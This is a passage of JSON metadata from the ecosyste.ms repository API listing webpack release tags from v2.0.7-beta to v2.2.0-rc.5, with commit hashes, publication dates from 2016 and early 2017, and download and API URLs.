ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-bet